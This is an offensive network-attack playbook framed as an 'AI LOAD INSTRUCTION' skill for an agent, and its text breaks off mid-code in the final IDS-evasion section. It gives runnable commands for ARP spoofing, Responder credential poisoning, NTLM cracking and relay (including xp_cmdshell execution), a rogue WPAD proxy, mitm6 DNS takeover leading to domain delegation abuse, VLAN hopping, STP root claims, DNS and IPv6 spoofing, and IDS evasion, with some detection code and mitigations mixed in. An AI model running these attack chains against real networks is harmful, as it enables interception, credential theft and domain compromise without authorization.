network-protocol-attacks


SKILL: Network Protocol Attacks — Expert Attack Playbook


AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.

0. RELATED ROUTING


Before going deep, consider loading:
  • tunneling-and-pivoting after establishing MitM position for traffic redirection
  • ntlm-relay-coercion for relaying captured NTLM hashes from poisoning attacks
  • unauthorized-access-common-services for exploiting services discovered during network attacks
  • traffic-analysis-pcap for analyzing captured traffic from MitM

Advanced Reference


Also load NAME_RESOLUTION_POISONING.md when you need:
  • Detailed Responder/mitm6 configuration and workflows
  • NTLM relay target selection and chaining
  • Credential format analysis and cracking priorities


1. ARP SPOOFING


Gratuitous ARP — MitM Positioning


```bash
# arpspoof (dsniff suite) - enable forwarding first, otherwise poisoning cuts the victim off instead of intercepting
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

# ettercap - ARP poisoning with sniffing (arp:remote also captures traffic crossing the gateway)
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//

# bettercap - modern framework; the set/on lines are entered in its interactive session
bettercap -iface eth0
set arp.spoof.targets VICTIM_IP
arp.spoof on
net.sniff on
```

Poison both directions or you only see half of each conversation: arpspoof needs the two instances above (one lying to the victim about the gateway, one lying to the gateway about the victim), ettercap's arp:remote does both, and bettercap only poisons the gateway side when arp.spoof.fullduplex is true.

Selective Targeting


```bash
# bettercap - target specific hosts, avoid detection
set arp.spoof.targets 10.0.0.50,10.0.0.51
set arp.spoof.fullduplex true    # also poison the gateway's view of the targets, so replies flow through us too
set arp.spoof.internal true      # also spoof traffic between the targets and other LAN hosts, not just target<->gateway
arp.spoof on
```

Narrowing the target list limits which hosts are poisoned and how much ARP noise hits the wire; it does not make the attack silent, since re-poisoning still sends a steady stream of unsolicited ARP replies that arpwatch or Dynamic ARP Inspection will see.

Detection Indicators


  • Duplicate MAC addresses in the ARP table: the same MAC listed for the gateway IP and for another host (arp -a on a victim)
  • Bursts of unsolicited (gratuitous) ARP replies for the gateway IP carrying a MAC that is not the gateway's
  • Detection: arpwatch (logs every IP-to-MAC change), or a switch running Dynamic ARP Inspection against its DHCP snooping table
  • Prevention: static ARP entries for the gateway on critical hosts, DAI on the switch; 802.1X controls who joins the segment but does not stop an authenticated host from spoofing
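The indicators above as runnable detection logic, added here as an example and not part of the original playbook or of arpwatch. It consumes (time, sender IP, sender MAC, target IP) tuples, which is what you would extract from `tcpdump -e arp` or a scapy sniff; the gateway address, the thresholds and the sample traffic are constructed assumptions.

```python
from collections import defaultdict, deque

GATEWAY_IP = "10.0.0.1"   # assumption: the segment's real default gateway

# Constructed sample ARP traffic, not a capture: (time_s, sender_ip, sender_mac, target_ip).
# An unsolicited announcement ("gratuitous ARP") has sender_ip == target_ip.
SAMPLE_ARP = [
    (0.0, "10.0.0.1",  "aa:aa:aa:aa:aa:01", "10.0.0.50"),  # real gateway answers the victim
    (0.5, "10.0.0.50", "bb:bb:bb:bb:bb:50", "10.0.0.1"),   # victim answers the gateway
    (1.0, "10.0.0.66", "cc:cc:cc:cc:cc:66", "10.0.0.66"),  # attacker host's own boot-time GARP (benign by itself)
    (5.0, "10.0.0.1",  "cc:cc:cc:cc:cc:66", "10.0.0.50"),  # attacker tells the victim "10.0.0.1 is at cc:...:66"
] + [
    # arpspoof-style re-announcements of the gateway IP every 2 s, all from the attacker's MAC
    (5.0 + 2.0 * i, "10.0.0.1", "cc:cc:cc:cc:cc:66", "10.0.0.1") for i in range(5)
]


def arp_anomalies(records, gateway_ip=GATEWAY_IP, storm_threshold=5, window_s=10.0):
    """Replay ARP records in time order and return a list of (kind, detail) alerts.

    binding_change : an IP that was bound to one MAC is now claimed by another
                     (the effect of a poisoned cache; arpwatch calls this a "changed ethernet address")
    duplicate_mac  : one MAC now owns the gateway IP and at least one other IP
                     (the duplicate-MAC indicator from the list above)
    garp_storm     : >= storm_threshold unsolicited announcements of the same IP/MAC pair
                     within window_s seconds (arpspoof re-poisons every 2 s, bettercap every 1 s)
    """
    alerts = []
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    recent = defaultdict(deque)       # (sender_ip, sender_mac) -> timestamps of unsolicited announcements
    reported_storm = set()
    for t, sender_ip, sender_mac, target_ip in sorted(records, key=lambda r: r[0]):
        sender_mac = sender_mac.lower()

        previous = ip_to_mac.get(sender_ip)
        if previous is not None and previous != sender_mac:
            alerts.append(("binding_change", f"{sender_ip}: {previous} -> {sender_mac}"))
        ip_to_mac[sender_ip] = sender_mac

        claimed = mac_to_ips[sender_mac]
        if sender_ip not in claimed:              # alert once, when the set of claimed IPs actually grows
            claimed.add(sender_ip)
            if gateway_ip in claimed and len(claimed) > 1:
                others = ",".join(sorted(claimed - {gateway_ip}))
                alerts.append(("duplicate_mac", f"{sender_mac} claims gateway {gateway_ip} and {others}"))

        if sender_ip == target_ip:                # unsolicited announcement
            window = recent[(sender_ip, sender_mac)]
            window.append(t)
            while window and t - window[0] > window_s:
                window.popleft()
            if len(window) >= storm_threshold and (sender_ip, sender_mac) not in reported_storm:
                reported_storm.add((sender_ip, sender_mac))
                alerts.append(("garp_storm",
                               f"{len(window)} announcements of {sender_ip} from {sender_mac} in {window_s}s"))
    return alerts


if __name__ == "__main__":
    for kind, detail in arp_anomalies(SAMPLE_ARP):
        print(f"[{kind}] {detail}")
```

The first three records are what a healthy segment looks like and produce nothing; the binding change fires on the first poisoned reply, the duplicate-MAC rule as soon as the attacker's MAC holds both its own address and the gateway's, and the storm rule only after the re-poisoning cadence has repeated for a while, which is why a single gratuitous ARP at boot is not an alert.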

2. LLMNR / NBT-NS / mDNS POISONING


Responder — Credential Capture


```bash
# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv
# Key flags:
#   -d  Answer DHCP broadcast requests, injecting a WPAD server into the DHCP reply (host fingerprinting is -f, not -d)
#   -w  Start the WPAD rogue proxy
#   -P  Force NTLM (transparent) or Basic (prompted) authentication on the proxy
#   -v  Verbose

# Analyze mode only (passive, no poisoning)
responder -I eth0 -A
```

Run -A first: it lists which hosts are broadcasting LLMNR/NBT-NS/mDNS queries and for which names, without answering anything, so you know who will be affected before you poison. Everything Responder captures lands in its logs directory as one file per protocol and hash type (for example SMB-NTLMv2-SSP-<ip>.txt), which is what the table below is keyed on.

Captured Hash Formats


| Protocol | Hash type | Hashcat mode | Crackability |
|---|---|---|---|
| NTLMv1 | NetNTLMv1 | 5500 | Fast. With Responder's default static challenge (1122334455667788) the NT hash itself can be recovered from precomputed tables, and that hash is directly usable for pass-the-hash; no password needed |
| NTLMv2 | NetNTLMv2 | 5600 | Moderate. Salted with the server and client challenges, so no precomputation; dictionary + rules only. Relay it while fresh, crack in the background |
| NTLMv1-ESS | NetNTLMv1+ESS | 5500 | Fast. hashcat handles ESS in mode 5500; to use rainbow tables, convert with ntlmv1-multi first so the ESS-derived challenge is stripped |

```bash
# Crack captured hashes (-m 5500 / --format=netntlm for NetNTLMv1 lines)
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
```
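Before cracking it helps to triage what Responder actually wrote to its logs. The following parser is an added example, not Responder's, hashcat's or john's code: it classifies a hash line as NetNTLMv1, NetNTLMv1-ESS or NetNTLMv2 from the field layout, flags the static Responder challenge, and for NetNTLMv2 decodes the client timestamp and the AV pairs from the blob (the MS-NLMP NTLMv2_CLIENT_CHALLENGE layout). The sample lines are constructed from placeholder hex, not captured hashes.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"   # Responder.conf default ("Challenge = ...")

# MS-NLMP AV_PAIR ids found in the NTLMv2 blob; string values are UTF-16LE
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
AV_STRINGS = {1, 2, 3, 4, 5, 9}


def _filetime_to_iso(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> ISO 8601 string."""
    return (FILETIME_EPOCH + timedelta(microseconds=ft // 10)).isoformat()


def _parse_av_pairs(data, offset):
    pairs = {}
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0:                      # MsvAvEOL terminates the list
            break
        value = data[offset:offset + av_len]
        offset += av_len
        pairs[AV_NAMES.get(av_id, str(av_id))] = value.decode("utf-16-le") if av_id in AV_STRINGS else value.hex()
    return pairs


def triage_netntlm(line):
    """Classify one Responder / ntlmrelayx hash line and say how to attack it.

    NetNTLMv1(+ESS): user::domain:LMresponse(48 hex):NTresponse(48 hex):server_challenge(16 hex)
    NetNTLMv2      : user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
    """
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a NetNTLM hash line")
    user, _, domain, f3, f4, f5 = parts
    info = {"user": user, "domain": domain}

    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16:
        lm = bytes.fromhex(f3)
        ess = lm[8:] == b"\x00" * 16      # ESS: LM field = 8-byte client nonce followed by 16 zero bytes
        info.update(format="NetNTLMv1-ESS" if ess else "NetNTLMv1", hashcat_mode=5500, john_format="netntlm",
                    server_challenge=f5.lower(), client_challenge=f3[:16].lower() if ess else None,
                    static_challenge=f5.lower() == RESPONDER_DEFAULT_CHALLENGE,
                    priority="crack: the NT hash is recoverable (rainbow tables if static_challenge), then pass-the-hash")
        return info

    blob = bytes.fromhex(f5) if len(f5) % 2 == 0 else b""
    if len(f3) == 16 and len(f4) == 32 and len(blob) >= 28 and blob[:8] == bytes.fromhex("0101000000000000"):
        timestamp = struct.unpack_from("<Q", blob, 8)[0]        # NTLMv2_CLIENT_CHALLENGE.TimeStamp
        info.update(format="NetNTLMv2", hashcat_mode=5600, john_format="netntlmv2",
                    server_challenge=f3.lower(), client_challenge=blob[16:24].hex(),
                    timestamp_utc=_filetime_to_iso(timestamp), av_pairs=_parse_av_pairs(blob, 28),
                    static_challenge=f3.lower() == RESPONDER_DEFAULT_CHALLENGE,
                    priority="relay while the capture is fresh; crack offline with dictionary + rules")
        return info
    raise ValueError("unrecognised NetNTLM layout")


# Constructed sample lines with placeholder hex (not captured hashes). The v2 blob is assembled
# by hand: header, FILETIME for 2024-01-01T00:00:00Z, client nonce, reserved, AV pairs, reserved.
SAMPLE_V1_ESS = "svc_backup::CORP:" + "1e2f3a4b5c6d7e8f" + "00" * 16 + ":" + "ab" * 24 + ":" + RESPONDER_DEFAULT_CHALLENGE
SAMPLE_V1 = "oldbox$::CORP:" + "cd" * 24 + ":" + "ef" * 24 + ":0123456789abcdef"
_AV = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le") + struct.pack("<HH", 0, 0)
_BLOB = (bytes.fromhex("0101000000000000") + struct.pack("<Q", 133485408000000000)
         + bytes.fromhex("a1b2c3d4e5f60708") + b"\x00" * 4 + _AV + b"\x00" * 4)
SAMPLE_V2 = "jdoe::CORP:" + RESPONDER_DEFAULT_CHALLENGE + ":" + "9f" * 16 + ":" + _BLOB.hex()

if __name__ == "__main__":
    for sample in (SAMPLE_V1_ESS, SAMPLE_V1, SAMPLE_V2):
        print(triage_netntlm(sample))
```

The timestamp and AV pairs are worth reading before relaying: the client timestamp tells you how stale a replayed capture is, and the NbDomainName/DnsComputerName pairs tell you which host and domain the client was authenticating to, which is what the relay target selection in NAME_RESOLUTION_POISONING.md starts from.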

Relay Instead of Crack


```bash
# ntlmrelayx - relay captured NTLM to other services
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access      # RBCD attack: adds a computer account and grants it delegation on the relayed host
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
```

When Responder and ntlmrelayx run together, set SMB = Off and HTTP = Off in Responder.conf so Responder only poisons and ntlmrelayx owns the listeners; otherwise they fight over ports 445 and 80. A captured authentication cannot be relayed back to the host it came from (reflection has been blocked since MS08-068), so the target list must contain other machines, and the conditions listed in §4 (signing, channel binding, MachineAccountQuota) apply to whichever service you relay to.

---

3. WPAD ABUSE


```bash
# Responder with WPAD proxy
responder -I eth0 -wPv
```

WPAD flow:

1. Client asks DHCP (option 252) for a PAC URL, then DNS for wpad.<domain suffix>, and only then falls back to LLMNR/NBT-NS for the bare name "wpad"
2. Responder answers that fallback lookup and serves a rogue wpad.dat
3. The browser and every WinHTTP/WinINET client route web traffic through the attacker's proxy; -P demands proxy authentication, so the client sends NTLM → credential capture, or relay with ntlmrelayx

MS16-077 removed the LLMNR/NetBIOS fallback for WPAD on Windows, so a patched Windows client only accepts a PAC location from DHCP or DNS; against those hosts the rogue PAC has to arrive through the DNS takeover in §4 (mitm6 plus ntlmrelayx -wh). Unpatched hosts and non-Windows clients that implement WPAD still fall back.

Manual WPAD PAC File


```javascript
// Rogue wpad.dat content
function FindProxyForURL(url, host) {
    return "PROXY ATTACKER_IP:3128; DIRECT";
}
```

Serve it with Content-Type application/x-ns-proxy-autoconfig. The trailing DIRECT keeps the victim online if the rogue proxy dies or stops answering, which avoids the helpdesk ticket a dead proxy would generate.

4. DHCPv6 ATTACK — mitm6


Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default: IPv6 is enabled and preferred on every interface, and nobody answers those solicits until an attacker does.

```bash
# mitm6 -> DNS takeover -> NTLM relay
mitm6 -d domain.com

# In parallel: relay captured NTLM to LDAP(S) for delegation
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
```

Attack chain:

1. mitm6 answers the DHCPv6 solicits and hands out a lease whose DNS server is the attacker; IPv4 keeps working, so nothing visibly breaks on the victim
2. Windows sends its DNS queries to the IPv6 DNS server, so the WPAD lookup resolves to the attacker (-wh is the name ntlmrelayx serves the PAC under; keep it inside the -d domain so mitm6 resolves it to the attacker, and -6 makes ntlmrelayx listen on IPv6)
3. The PAC forces proxy authentication → NTLM relayed to LDAP(S) → create a machine account and write RBCD on the victim computer object (without --delegate-access the relay dumps the domain into the -l directory instead)

Keep runs short and planned: while mitm6 is up the victims resolve through the attacker, so a crash or a long run turns into a visible outage.

Key Conditions


  • SMB signing not required on the SMB relay targets (the default on workstations and non-DC servers)
  • LDAP signing not enforced on the DC for ldap://; for ldaps:// the control that matters is LDAP channel binding (EPA), which must not be enforced
  • ms-DS-MachineAccountQuota > 0 (default 10): --delegate-access creates a new computer account to hold the delegation right
  • The relayed identity should be a computer account for --delegate-access, since RBCD is written on that computer's own object; with a relayed user session, use the LDAP domain dump or --escalate-user instead

5. VLAN HOPPING


Switch Spoofing (DTP)


```bash
# yersinia - DTP attack 1 ("enabling trunking") negotiates a trunk on our own port
yersinia dtp -attack 1 -interface eth0

# frogger.sh - automated VLAN hopping via DTP (sniffs VLAN IDs, negotiates the trunk, brings up tagged subinterfaces)
./frogger.sh

# Sends DTP frames -> switch enables trunking -> every VLAN arrives as 802.1Q-tagged frames
# After trunk established:
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
```

This only works when the port is in DTP dynamic auto or dynamic desirable mode (the default on many Cisco switches); a port set to static access, or with switchport nonegotiate, ignores the frames. Pick TARGET_VLAN from the tags you see once trunking is up (tcpdump -e -i eth0 vlan prints the VLAN ID of every tagged frame). vconfig and ifconfig are legacy tools; the iproute2 equivalent is ip link add link eth0 name eth0.TARGET_VLAN type vlan id TARGET_VLAN, followed by ip addr add and ip link set up on the new interface.

Double Tagging (802.1Q)


```python
# Craft double-tagged frame: outer=native VLAN, inner=target VLAN
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
```

Preconditions and limits: the attacker's access port must sit in the trunk's native VLAN, because the first switch strips the outer tag only when it equals the native VLAN, which leaves the inner tag for the next switch to honour. It is one-way only: replies follow the normal path back through the real gateway and are never tagged towards the attacker. Effective for blind attacks (e.g., a single UDP packet to a service on the target VLAN), not for anything that needs a response.
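What the two switches do to that frame, byte by byte, as an added example that is not part of the original playbook and does not need scapy: a minimal 802.1Q tag builder and parser plus a model of the native-VLAN untagging that makes the hop work, so a given native VLAN setting can be checked before sending anything. The switch behaviour is modelled as the simple rules described above (native VLAN leaves a trunk untagged unless the native VLAN is tagged), and the MACs and payload are constructed.

```python
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(dst_mac, src_mac, vlan_ids, ethertype, payload, pcp=0):
    """Ethernet II frame with a stack of 802.1Q tags, outermost first (the Ether()/Dot1Q()/Dot1Q() layout)."""
    frame = mac_bytes(dst_mac) + mac_bytes(src_mac)
    for vid in vlan_ids:
        if not 0 <= vid <= 4094:
            raise ValueError("VLAN id out of range")
        tci = (pcp << 13) | vid                    # TCI = PCP(3) | DEI(1) | VID(12)
        frame += struct.pack("!HH", TPID_8021Q, tci)
    return frame + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    """Walk the tag stack until the first ethertype that is not 0x8100."""
    offset, vlan_ids = 12, []
    while True:
        ethertype = struct.unpack_from("!H", frame, offset)[0]
        if ethertype != TPID_8021Q:
            break
        vlan_ids.append(struct.unpack_from("!H", frame, offset + 2)[0] & 0x0FFF)
        offset += 4
    return {"dst": mac_str(frame[:6]), "src": mac_str(frame[6:12]), "vlans": vlan_ids,
            "ethertype": ethertype, "payload": frame[offset + 2:]}


def strip_outer_tag(frame):
    return frame[:12] + frame[16:]


def trunk_egress(frame, native_vlan, tag_native=False):
    """Model of the first switch: a frame in the trunk's native VLAN leaves the trunk untagged
    (unless 'vlan dot1q tag native' is configured), which removes the attacker's outer tag."""
    parsed = parse_frame(frame)
    if parsed["vlans"] and parsed["vlans"][0] == native_vlan and not tag_native:
        return strip_outer_tag(frame)
    return frame


def trunk_ingress_vlan(frame, native_vlan):
    """Model of the second switch: an untagged frame belongs to the native VLAN, a tagged one to its outer tag."""
    parsed = parse_frame(frame)
    return parsed["vlans"][0] if parsed["vlans"] else native_vlan


def double_tag_hop(native_vlan, target_vlan=100, tag_native=False, attacker_vlan=1):
    """VLAN the attacker's double-tagged frame lands in after crossing one trunk between two switches."""
    frame = build_frame("ff:ff:ff:ff:ff:ff", "de:ad:be:ef:00:01", [attacker_vlan, target_vlan],
                        ETHERTYPE_IPV4, b"constructed payload")
    on_the_wire = trunk_egress(frame, native_vlan, tag_native)
    return trunk_ingress_vlan(on_the_wire, native_vlan)


if __name__ == "__main__":
    print("native VLAN 1, untagged native :", double_tag_hop(native_vlan=1))                   # 100: hop succeeds
    print("native VLAN 999                :", double_tag_hop(native_vlan=999))                 # 1: stays in VLAN 1
    print("native VLAN 1, tagged native   :", double_tag_hop(native_vlan=1, tag_native=True))  # 1: stays in VLAN 1
```

The three runs reproduce the mitigation list: the hop only lands in VLAN 100 when the attacker's VLAN is the untagged native VLAN of the trunk; moving the native VLAN to 999 or tagging it leaves the frame in VLAN 1 with its inner tag never interpreted.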

Mitigation


  • Disable DTP on every access port:
    switchport mode access plus switchport nonegotiate
  • Set the trunk native VLAN to an unused one and tag it anyway, so no frame ever crosses a trunk untagged:
    switchport trunk native vlan 999 and, globally, vlan dot1q tag native
  • Prune VLANs: only allow needed VLANs on trunk ports (switchport trunk allowed vlan <list>)

6. STP MANIPULATION


Root Bridge Claim


```bash
# yersinia - claim root bridge with lowest priority (attack 4 = "Claiming Root Role")
yersinia stp -attack 4 -interface eth0
# Sends Configuration BPDUs with priority 0 -> lowest Bridge ID -> elected root
# Traffic between the two sides of the recomputed tree now crosses the attacker -> MitM
```

Root election picks the lowest Bridge ID (priority field first, MAC as tie-breaker), so priority 0 beats every switch left at the default 32768. Interception only follows if the attacker is dual-homed: with links into two switches, the new tree carries inter-switch traffic across the attacker's box (yersinia attack 6, "Claiming Root Role with MiTM", is built for this and needs two interfaces). With a single uplink the result is a topology change, possibly an outage, and no traffic through the attacker.

Topology Change Attack


```bash
# Send TCN (Topology Change Notification) BPDUs -> the root sets the TC flag -> every switch ages MAC entries after forward_delay (15 s) instead of 300 s
yersinia stp -attack 1 -interface eth0
# Switches flood unknown-unicast frames until they relearn addresses -> sniff traffic the CAM table would otherwise keep off our port
```
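A decoder for the BPDUs both attacks send, added here as an example and not part of the original page or of yersinia: it encodes and decodes 802.1D Configuration and TCN BPDUs (the STP payload that follows the 802.2 LLC header) and reports what BPDU Guard and Root Guard would act on. The legitimate root's identity and the sample BPDUs are constructed assumptions.

```python
import struct

BPDU_TYPE_CONFIG, BPDU_TYPE_TCN = 0x00, 0x80
FLAG_TC, FLAG_TCA = 0x01, 0x80
CONFIG_BPDU_FMT = "!HBBBH6sIH6sHHHHH"          # 35 bytes: 802.1D-1998 Configuration BPDU
TCN_BPDU = bytes([0x00, 0x00, 0x00, BPDU_TYPE_TCN])


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_config_bpdu(root_priority, root_mac, bridge_priority, bridge_mac, root_path_cost=0,
                      port_id=0x8001, flags=0, message_age=0, max_age=20, hello_time=2, forward_delay=15):
    """Encode a Configuration BPDU. Timers are given in seconds and carried in 1/256 s units on the wire.
    Priority is the full 16-bit field (priority*4096 + system-ID extension on 802.1t switches)."""
    return struct.pack(CONFIG_BPDU_FMT, 0, 0, BPDU_TYPE_CONFIG, flags,
                       root_priority, mac_bytes(root_mac), root_path_cost,
                       bridge_priority, mac_bytes(bridge_mac), port_id,
                       message_age * 256, max_age * 256, hello_time * 256, forward_delay * 256)


def parse_bpdu(data):
    if len(data) < 4 or data[:2] != b"\x00\x00":
        raise ValueError("not an STP BPDU")
    if data[3] == BPDU_TYPE_TCN:
        return {"type": "TCN"}
    if data[3] != BPDU_TYPE_CONFIG or len(data) < 35:
        raise ValueError("unsupported or truncated BPDU")
    (_, _, _, flags, root_prio, root_mac, cost, bridge_prio, bridge_mac,
     port_id, msg_age, max_age, hello, fwd_delay) = struct.unpack(CONFIG_BPDU_FMT, data[:35])
    return {"type": "CONFIG", "tc": bool(flags & FLAG_TC), "tca": bool(flags & FLAG_TCA),
            "root_priority": root_prio & 0xF000, "root_sysid_ext": root_prio & 0x0FFF,
            "root_mac": mac_str(root_mac), "root_path_cost": cost,
            "bridge_priority": bridge_prio & 0xF000, "bridge_mac": mac_str(bridge_mac),
            "port_id": port_id, "message_age_s": msg_age / 256, "max_age_s": max_age / 256,
            "hello_s": hello / 256, "forward_delay_s": fwd_delay / 256}


def bridge_id(priority, mac):
    """STP compares Bridge IDs numerically: priority first, then MAC; the lower value wins."""
    return (priority, mac_bytes(mac))


def assess_bpdu(data, port_is_edge, legit_root):
    """Findings a switch with BPDU Guard / Root Guard would act on. legit_root = (priority, mac) of the real root."""
    bpdu = parse_bpdu(data)
    findings = []
    if port_is_edge:
        findings.append(("bpdu_on_edge_port", "BPDU Guard would err-disable this access port"))
    if bpdu["type"] == "TCN":
        findings.append(("tcn", "topology change notification: MAC aging drops to forward_delay, flooding follows"))
        return findings
    if bridge_id(bpdu["root_priority"] | bpdu["root_sysid_ext"], bpdu["root_mac"]) < bridge_id(*legit_root):
        findings.append(("superior_root",
                         f"claims root {bpdu['root_priority']}/{bpdu['root_mac']}; Root Guard would block the port"))
    if bpdu["tc"]:
        findings.append(("tc_flag", "TC flag set by the root: every switch shortens MAC aging"))
    return findings


# Constructed topology: real root bridge at the default priority 32768, attacker claiming priority 0.
LEGIT_ROOT = (32768, "00:11:22:33:44:55")
ATTACKER_BPDU = build_config_bpdu(0, "de:ad:be:ef:00:01", 0, "de:ad:be:ef:00:01")
NORMAL_BPDU = build_config_bpdu(32768, "00:11:22:33:44:55", 32768, "00:11:22:33:44:55")

if __name__ == "__main__":
    for name, pdu in (("normal", NORMAL_BPDU), ("attacker", ATTACKER_BPDU), ("tcn", TCN_BPDU)):
        print(name, assess_bpdu(pdu, port_is_edge=True, legit_root=LEGIT_ROOT))
```

Feed it the bytes after the LLC header of frames sent to 01:80:c2:00:00:00 (tcpdump -e stp shows them) and the superior_root finding is exactly the condition Root Guard triggers on, while bpdu_on_edge_port is what BPDU Guard acts on regardless of content.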

Mitigation


  • BPDU Guard on access ports: any BPDU received err-disables the port, which stops both attacks at the edge
    spanning-tree portfast bpduguard enable (per port) or spanning-tree portfast bpduguard default (global, all PortFast ports)
  • Root Guard on designated ports facing devices that must never become root: a superior BPDU puts the port into root-inconsistent state instead of re-electing
    spanning-tree guard root

7. DNS SPOOFING


DNS Response Spoofing (on-path)

```bash
# bettercap DNS spoofing (answers only queries that pass through us: run arp.spoof first)
bettercap -iface eth0
set dns.spoof.domains target.com,*.target.com
set dns.spoof.address ATTACKER_IP
dns.spoof on

# ettercap DNS spoofing (via etter.dns config)
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
```

This is on-path response forgery, not resolver cache poisoning: the forged answer reaches only the poisoned clients and lives in their local cache until its TTL expires (ipconfig /flushdns clears it). Clients that use DNS over HTTPS or a resolver outside the MitM path are unaffected.

Kaminsky Attack Variant


Classic cache poisoning of a recursive resolver rather than an on-path trick: the attacker makes the resolver look up many random, never-cached names (a7f3.target.com, b91c.target.com, ...) and races each lookup with a flood of forged responses that guess the 16-bit transaction ID. Every forged response carries an authority section delegating target.com to an attacker-controlled NS, with glue for that NS in the additional section, so one winning guess rewrites the delegation of the whole zone in the cache instead of a single name, and the random subdomains give unlimited attempts because nothing is cached between them. Source-port randomization (the 2008 fix) expands the guess space from 2^16 to roughly 2^32, and DNSSEC validation rejects the forged delegation outright.

8. IPv6 ATTACKS


Router Advertisement Spoofing


```bash
# Send rogue RA -> victim configures the attacker as default gateway (and takes the advertised prefix via SLAAC)
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64

# THC-IPv6 suite for comprehensive IPv6 attacks
atk6-parasite6 eth0      # ICMPv6 neighbor spoofing: answers every Neighbor Solicitation, the NDP equivalent of ARP spoofing
atk6-redir6 eth0 ...     # Traffic redirection via ICMPv6 redirect
```

SLAAC Abuse


  • Advertise a rogue prefix → victims auto-configure an address in it (SLAAC) and take the advertising router as default gateway
  • Add a rogue DNS server through the RA RDNSS option (RFC 8106), or pair it with DHCPv6 (§4) → full MitM over IPv6 without touching IPv4
  • Windows prefers IPv6 over IPv4 by default, so for any name that resolves to both AAAA and A records the attacker's IPv6 path wins

Mitigation: RA Guard and DHCPv6 Guard on access ports (RFC 6105; RFC 7113 covers the evasion through fragmented extension headers), or disable IPv6 where it is genuinely unused rather than leaving it on and unmanaged.

---

9. IDS/IPS EVASION


| Technique | Method | Tool / flag |
|---|---|---|
| IP fragmentation | Split the payload across IP fragments so that no single fragment contains the signature | nmap -f (8-byte fragments) or nmap --mtu N, fragroute ip_frag |
| TTL manipulation (insertion) | Send chaff packets whose TTL reaches the sensor but expires before the target, so the sensor reassembles data the host never sees | fragroute ip_ttl, ip_chaff, tcp_chaff |
| Encoding evasion | URL / Unicode / hex encoding of the payload so a literal signature does not match | Manual, custom scripts |
| Session splicing | Split the application payload across many small TCP segments | fragroute tcp_seg; nmap --data-length only pads probes with random bytes and does not splice |
| Timing-based | Scan slowly enough to stay under rate thresholds | nmap -T0, nmap -T1 |
| Decoy scanning | Mix the real scan with decoy source IPs so the analyst cannot tell which source is live | nmap -D RND:10 |
| Idle/zombie scan | Bounce the scan off an idle host's predictable IP ID sequence; the target only ever sees the zombie | nmap -sI ZOMBIE_IP |

```bash
# fragroute - fragment and reorder every packet this host sends to TARGET_IP
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP

# nmap evasion combinations (-f and --mtu are mutually exclusive; --mtu must be a multiple of 8)
nmap -sS --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
```

Start fragroute first and run the scanner or client in another shell: it intercepts the host's outbound traffic to TARGET_IP and rewrites it according to the rule file. Fragmentation alone rarely beats a current IDS, since Snort's frag3 and Suricata's defrag reassemble with target-based policies before matching; the insertion directives (ip_ttl, ip_chaff, tcp_chaff) aim at the gap between what the sensor reassembles and what the host accepts, and decoys and timing work against the alerting pipeline rather than the signature.

---
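Why 8-byte fragments beat a signature engine that does not reassemble, as an added example not taken from fragroute or nmap: a fragmenter that follows the IP rules (every non-final fragment is a multiple of 8 bytes, `order random` shuffles the sending order), a target-style reassembler, and the two IDS matching policies side by side. The HTTP request and the signature are constructed.

```python
import random

IP_FRAG_UNIT = 8   # IPv4 fragment offsets count 8-byte units, so every non-final fragment is a multiple of 8

# Constructed HTTP request and the signature a content IDS would look for (not real ruleset content).
SAMPLE_REQUEST = b"GET /cgi-bin/../../etc/passwd HTTP/1.0\r\n\r\n"
SIGNATURE = b"/etc/passwd"


def fragment(payload, frag_size=8, order="keep", seed=None):
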